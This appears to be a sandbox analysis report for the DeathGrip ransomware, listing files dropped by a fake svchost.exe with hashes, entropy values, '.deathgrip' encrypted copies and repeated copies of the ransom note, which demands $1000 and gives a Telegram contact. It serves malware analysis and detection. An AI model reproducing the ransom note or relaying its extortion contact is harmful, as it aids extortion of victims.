                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_082907_5964-5996.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_082907_5964-5996.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_083412_6972-6976.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_083412_6972-6976.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_083652_5268-4940.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_083652_5268-4940.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):1.7692687228622284
                                                          Encrypted:false
                                                          SSDEEP:192:41BMAk9zTz3TVYWCsTR0XtwW1D/q1v212otGOOeV5LeBHn87iDpPB:41+tjRS0SXtw6jqQEoqQC
                                                          MD5:C10BE8DDF86DCF491BC319B6F1C302AA
                                                          SHA1:7B6D669D5F26F0B3513E62F5EA78BB4BB44299E8
                                                          SHA-256:395DFB42155EF934FF4BB004A1F6CB6340C81BA66264EEB174C06E84B19CF222
                                                          SHA-512:1197AD75E5DB49DF258FB0E4F03EB586021437DC4D65F477DED23EFE3C8A17CB013E632D8510B5B9A047FB72FDBE0056A0FE1FCBD8741426905B7AB4F3E6A96E
                                                          Malicious:false
                                                          Preview:........j7..... i.H>91..l..Mb...)+..J...M].]...R..~`......e|;..f.............{.A(z..d.tv(.wG#%...'..z.K.R.hl.Jd/.Z..x.`.h..|&Q>E.GxL.z.4ViV.:2h..N=N:..k......n@Pd0@...v..h9...++>......f...2Qp..:h.r...Y%'..w'..~F.......F!...B7 .!..l..Y.;.....ao.&*..W..t..J..=c..m%..F-..H.......}.0.yP....g.-VP...jq*.?...j.v......P.z...$.#.2.$%o.9..l..y.........e-...%.|P8..../..5.~...A+..L..m=.. ....3(4.t$r..$.A....%.A.A?d{..j.;.4...T.....~.Z.g..dna.R.+G...S[.u]l.'....A.f.(a..\B....4...x...aJ.\U9...$....u....5...6....p:.jf....I.s........E...K!..j.r.S..:.'[.c.\5~'...`Q..xj.~r...kn..t.L).....K].c;....i<.%.G..s...w.C7..Y...$./ ...?...Ii......b%....0...:.5....l...I..v.q.3.0..7A.,...$.....r...0...q;.9..|F..$.tn.n......29.c.....y/...3..K...... t....B..o0u.Q.....>...\.....-...a....B._=............=..u.t.u...=...+3..^k..p...."|.,.........F.....).r.....D\" .y.*T.....l^o|......yNm^,..oZ.S..`b.... .2.p.u....$..Ki.EG....Xs..!......W.4 a.c.Q....Bv.F..nd...j..a.e........A.3.d.b.

                                                          C:\Users\jones\AppData\Local\Microsoft\Windows\History\History.IE5\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Microsoft\Windows\History\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Microsoft\Windows\INetCache\IE\container.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Windows\INetCache\IE\container.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.128253055969964
                                                          Encrypted:false
                                                          SSDEEP:6:IKzWxiJ0+/K+DgpG9b6JD3RsAJG0pTtRugSULzK7LD8BfXldDfnxTDNCU7EGTjM5:ZIoy8gpr6AI0pTbRnGLoBNNnxTBz7XTm
                                                          MD5:24F585F2414C0A74BD8C1F00F1031F08
                                                          SHA1:C0BB7CCA173975591A53D03BE24C92D414CFEE71
                                                          SHA-256:CFF7D7D279CAC9DB3667F5B9DBC83604370E549AF96235BD9FB6B1835FC839E2
                                                          SHA-512:10E697EEC763EE5C0E96890B05C29A89B8FFA5E053C58A993E7837B83FBD80C110611BCE3725889D36D3A19FA95BA3599B4EA456599D4CA963DF7CF819EF87BB
                                                          Malicious:false
                                                          Preview:........T.c...}@.q...iJwYAZEc6TRKzP45YPXh78PFzioe7g+H0LtvFEemVwyqf1ZH3VNnalXTYOrO7peJ1qtyi81r5kcvADBH8UJdOu/gpv51mA0W+pcaFqmiGKkOE+4GqWdJFeL7TDMjClSpNOzxTqvoUdhZ/4hafjNnGSNEf/6DgRcC0IbVfO1nD241eHNVnYdRXT9EXbhL7Lam5tOtHaU9lVdr1EcxlROdX4Rf+pRQHugHUMk72GDZxPfioj8dHW3su/fUy8stptmPDKVTUetaGbu714PHxcPbVu3xkiNsaMzOXBFsVcaHcwz9EQJ6FsKWFBOZcHUvXo3isiNZ68E+zpJLNxnNdIGaBw==

                                                          C:\Users\jones\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048944
                                                          Entropy (8bit):7.999823446482509
                                                          Encrypted:true
                                                          SSDEEP:24576:4mZ72jO6oZ2E+F7yXSgZULgzP53ol4xWF:K5oZ2E+AXSgZU8zPhUn
                                                          MD5:658AAE0414CF36F2ADF2181A2004C028
                                                          SHA1:4ADC6F944B2C9DFAA6232365C0FC2A477638494E
                                                          SHA-256:872EECC3CB30F568B2A71E5FCC917A1FEA249BCF429374B353854196EAB3CB00
                                                          SHA-512:A95E9A6BE122E397A33750CCF4B1B783F9BD96FEB60CF492BA2EF6D6885D8B45A15206EC56FB4D36EC2C3AFE44883756CE9F013D725B926A017D1CA7517BA337
                                                          Malicious:true
                                                          Preview:..........y*...#..$M..2^d....\..s....M........].{{.%......Kk7..(.+..l..if......m.V"...cd.....~.yz. ....D.Z..cJ.N)B. .@-.B.._s.e.8...H.8..y.....+....`=..D....Z..............7`.g.....CY.h...B0t..`."^..s.H..6x.|.......j.&.O.Z..z@^..........z..R..1.EMso....]..vf...q..su.Vj..&.[.-sTqG7._B..Dm....b.~.....kq~=/H.......1[j........k.2f..nz.ph>.Y#t..Uv"$-...hJ..r....).%.....n.2....Z....I./....?...G.....t..r&..^.\S.J........:....wi!-Qe.j1..s..dI8>;...7."..tFb.j.ei.~&...>.c....ua..a".I....s.x.B....f.?Q.......{..N[....."54....?x/...... 9.u....[t)...,....D...'.\..{(.(8s#...v4n.#H:.....A..wq;.u..1'...4..=..@~..p.(.9Q.4Md~.N }Z./%.P/.......J...W...\[@R...e.f`\!.. ...G.W.v..gt`F.*.%@...G%..*.K.a..(.K/.'...A.-......[.........s.#(4-..L.}.K:.......W. ..Mo...i.r.jH.._..ir..*..5.b9..T.sx...L....q...*...o#c._6.Qj ......7..VU2...].@....+.>"..dq..JR..lc...xj6T.t...g...rj..k..0U.[V.Y5...G.L:U..@..G...~..|p...;...B.Zy...........y}.0:.W...0..1.Z.FS D8]..".&

                                                          C:\Users\jones\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64304
                                                          Entropy (8bit):7.997452926420158
                                                          Encrypted:true
                                                          SSDEEP:1536:90pQwdOp99Dc2vYAY7XahR+iClFXwJuzcA8:90GAOp7HmXm+/FgyI
                                                          MD5:31233B276A4062612A55A509940F400A
                                                          SHA1:0BCED15F8C8A3C9765034977D20B5A76CE3568B0
                                                          SHA-256:FBC4075CFAB6B51D18AD5D0DD9C65D9BE7ADF958FC77D64ECA5E7D9BF3E31AB6
                                                          SHA-512:9A468189E8A2CB2359B7C37F84F1D42AD5F34D185BD86F7ADAD92D33C91652AAAE78BA91D94498E8D367528AEFAEE3643B1AF9F9AD5C64AAE6940595F80F77E1
                                                          Malicious:true
                                                          Preview:........x.:.W.r.R>...[[...H....i.$..+....G".....".Q.o.9.Q..A......ow.i.8b..8r=.oO.4..?..J#.vE.h[..3......9.6.y(49....F. .5..%....M...i/~..)2,...E.3...Tn.U..f...3f....D.<.....I...R..S....i.S.. ..H*.....{...H..ln..ke...,......-..G[.l.....\d..n.'.f.k.C1.....fF....H...4...y.$.9.b..r.!aT.H9....S<.8..]:.U..X.~......CJ.?....O...]......X.|....I.k=.L.p 0UTp...;P..<.....FP..b...3.'|a.{5...{..%..wm.~...|N....(..(!...G@..n.$P.'g.@.......t........:....Z.x......7h..=..u.....s.](.T..?...]\B.U...l....K.....l.......v.Ky.N..T..[>>....n....P......ha.*.`....v....5.....`1.s.L.Urn<..K..Qw.P.z....U..m..k..zH..".tpb.C:b\^.*...<....Y.o...2.,Hb.t.he...Y...5...]........0.......P.F..klz..'...-e...6..._.3`.........2?...}.S..A....-MV..\...\....P.IO.M.A.C....f......$......g.+...J<..Z.=....)...h@G..,.7E.L..9.....2.z4J.g.S.....{...*.t...{....c...../.z.....Y.\+.w...n.8c....B..+.@.R..<>..myPL:Z...$.x.(~&E...nn.....(.+!......P.2D....A{o.....^}.Iu..........

                                                          C:\Users\jones\AppData\Local\Microsoft\Windows\WebCache\V01.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Windows\WebCache\V01.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):524656
                                                          Entropy (8bit):7.999681556890541
                                                          Encrypted:true
                                                          SSDEEP:12288:/ccg4yHnXKBC6InAOF1o/wjp8oaKbBsH3HSlhzPWKzOb:/oEBC6UAW15jHaGsH3HIhyK0
                                                          MD5:002AA56693D85206E0C09AE823A56AD8
                                                          SHA1:DA03A92611A0ABEC4A64FD9F67E9DA02857B0885
                                                          SHA-256:B10D8020B3B6BC3F1D6BDC1819B2E6A293BA8D51F5EE1543FA491F25D20BAC5C
                                                          SHA-512:88464EB80048CA36F8F8139B07070B0D698C9F589B5FBE8EE537E57A9B14C83F2616E61CD18F1EBD36784233C500F08430E93E7F2979BE03B422ACB6D09668DE
                                                          Malicious:true
                                                          Preview:........{.d........V..hG#.m.....|.W......h.1.;..$J|.)Y..#.)$.#@l,.L.]....e....L.m|.$...o.\.8...<g..&.....xjCm.N.+.y<;.(..gN.......}.%Iz..*...S..'...SNw.f1..L)D.X..K'.....B..<.?.e.H.4a.......U...b8...i..f.....Y.h=......-#X....L...l.jy.}.sD......G.|P....8...../.G7q..<./)....xeN.m...Ae.. J4.&..K.;#....{{....l..B$...9..:G...<..G........-.......%....g..x.^.B..K~.v .H..r....^...zK.?..*../K.^....(%....3W.d..-........'D....f....`..a.[i).7....hO.I.. H.............,.8....Yi.. E......$.p./h&!*.....;.........@.....c...w..Y..!.....`....W`.......J......,....p..@..z..............av.{...b.#h.>.By..h...}....&;..n#"!..L...l....T......lK$..X#...WZ..C...V\Cv..0..tGE_....A..'..e..].X...)(...xa.._._.........%.Y......6i7...&&n...../.i!..A....C.Ey.S.&e....b%..-.....~.....v...J.J.s.7..*.W.......{..`X.HP...U.".J.I..@...41.....6.....Q...q.T.?>'.7..$...16..T .N~..U >..}s..*..P.,)"2.R.w.M@...xK..".T..$.VcYc ..w..".A..-F.y......@..{b..C;.5.]...]....d3t.i..

                                                          C:\Users\jones\AppData\Local\Microsoft\Windows\WebCache\V0100009.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):524656
                                                          Entropy (8bit):7.999673832237816
                                                          Encrypted:true
                                                          SSDEEP:12288:mwJUiiBMLfa+DR8mHm/qI+OOEpyzixFbIt2SfPkKbJM:mwUiie7a+pEp8y58XkMM
                                                          MD5:4AAC250E9A7B9C254CCD789AED0FEB3F
                                                          SHA1:E37FBD33C068E9F2A43E0D42FCF2353E6F856F24
                                                          SHA-256:7E20D737FB2C7026A23E1BCF3F17867C5968CB31B51A09A9BE433CB989CB96A7
                                                          SHA-512:7DECFC49652426B11484D9D4E06D6E39C25BFF95B0D1A8E4110CD243D867C43D40CC41B64F396F90AA1C4DA7257D4D973F186DA4E6A44D9A9D7AC3E701E96E17
                                                          Malicious:true
                                                          Preview:..........E.,..:.f....A........u$..g.....^th........#>4..`$kj.?.+.B_.s.*.50.....T1.].M.J,..f\.tg..#Fh|./...\.AI;2}Z..X.G.....T..j..L.....'&.gZ.'B..C4@.....e.....4.......L.l...`.....Fb.....y...<Y.\....Aj..@../n.gthPH..v....QZ.....V."I...r..R.zVN.a.8;.;.c.......d..jI..._.....i.U|..Gw.*..W.Se~S.\na.......#[F..X.\.....%..A.....yv..0.Y...:.d."...c......_Pa......=E..i`...?..^.S.....=.5rK6......0.R./.0.w....m.@..c.3.l...!.@..X.p#.....6..:...........$..`x......{...|..-c......k....-.8k"...A.i..U..>6...S..\....O..2V.uT.<Z...oX....2..D...]..a..m6.(K.*Q.Y.}......#..+.Eg.W.Qq.K5.X%.hT..QzbR.gy......g.y........O...`...]..:.-..M..~......y....$...ugk....._.e.........`}.$....%.....6?8<...W.v.&KA 5iI.-..+...H.#.5..'..H.2....m0f...1...(.G..i#....-Y..N...{d.#z....(6....Ex2u!rG4.h..z.J....c.W......4.>.Q.......K.u.eN....X.^..w.....f.#..}.....x..|tu. .&`.%W..z..s...S...v.n....f....1}D*E.}.R.ub^.n....Z.-&d{.Ff.....0......G.h.%.L^I.q...)C"!\9..%..EN.d.kB.f..%.ne(

                                                          C:\Users\jones\AppData\Local\Microsoft\fluency\lm\en-GB\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\activity-stream.discovery_stream.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\activity-stream.discovery_stream.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1616
                                                          Entropy (8bit):7.799456846755807
                                                          Encrypted:false
                                                          SSDEEP:48:WigsCGjiry1T2O7OtT9sFNTnb0nMCy+dHoq6:WiJery1uyjrAnMRcoq6
                                                          MD5:613453BF8E471FE4BD8A57515BB5CEA3
                                                          SHA1:B1DA972D73034D17C4B5A2FE7624174FEDD0696B
                                                          SHA-256:42817917BEBC546862F6A58531CA56FF6DCF9E08A7C511D6016FEDECE556AC29
                                                          SHA-512:8D550B29CD40AB76502E8190B05463621D5D5FA0AB03A3D869C757966ED1EE770FA74E36191693F3B601D8D088DB84305A4D65178B02179D8F15274CAEBC5CD0
                                                          Malicious:false
                                                          Preview:........j......leq9.......x..O...G.$ke.y|...X.RJ............)B.y@.rt}Q...&.>.....T..8g....(.w!9...+.v....+F..(.+.M.......u........{..H4E>.'R?......j...#f....T.C...,5|..C.+U{f..:...l.b.0..x.#5.1.X.2.H.y.yQ....<..l4\...\c...,..L..{@;.1..B..b..I..o7[ne.D........s6.=o1....L..UL....\...C.bh......E.......7m.....3.Y.^......$..l_D%....*P.4K.0.{~..*.x....>...e"."...G...`.Hsfl.D.8)WT*k..A.~......"..H..C%....1f.C..*.....K.."z....B .......Q..A..L.....#..0r....B.2"..^.6'V.b.NQ...C..hO....fQ.V..'....AI'..k.&.$..-.E.d.w..}.,.)......^G9.R...A.V.I...P.D..l..G....E..s..<^..NZ..0d5.............'..z0..l....l..{j.....4..S.._6|.....',..qY.<z...?.7y.d..d*.s.."..(.'..CMZ(..n..>..Q....f..7...b...w<i.m...4sA.b:|..j...#O...;G...N..tC.........M...!b.!..Mi8.....c\.=..^.X..ei.1YO..+.F.cX..(]..(A.....,..d..K.h.5.#.m.....MIH,.K...f6.~...*'..fT.............!).Yj.3.~_.b...[.Q....u..uX.H..{I.6.......2Xa.|q...s.7.d.....y).......w.f4.........K^....8...r..^.......y...

                                                          C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\scriptCache-child-current.bin

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\scriptCache-child-current.bin.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2046464
                                                          Entropy (8bit):7.999910825372939
                                                          Encrypted:true
                                                          SSDEEP:49152:nUgxbpNpub40xzcDmgQ/YsNdti0wKwQNcg7z6CVzoaBv4PzWEcoudeDZM:Lpe5oDXQtxi0wScg7zX8ahhUZM
                                                          MD5:5EA7F8706B1DB61A5A7415D0E5FE73EA
                                                          SHA1:9DB7BE02255F8217B6D7780DB35E20A4514667C8
                                                          SHA-256:C8B28D0DB53A351F0A83C0B0DDD11B172DCFD7BB72858D0A0F31F1000A032082
                                                          SHA-512:238166AD977090DC832439D9E31B5131128110F55FE9040CDC2FB201564A6AC9BDC2B194960ED48133424D0FB3C7AC78C7FD6DCBF826E2FC0B6B720FD78783E1
                                                          Malicious:true
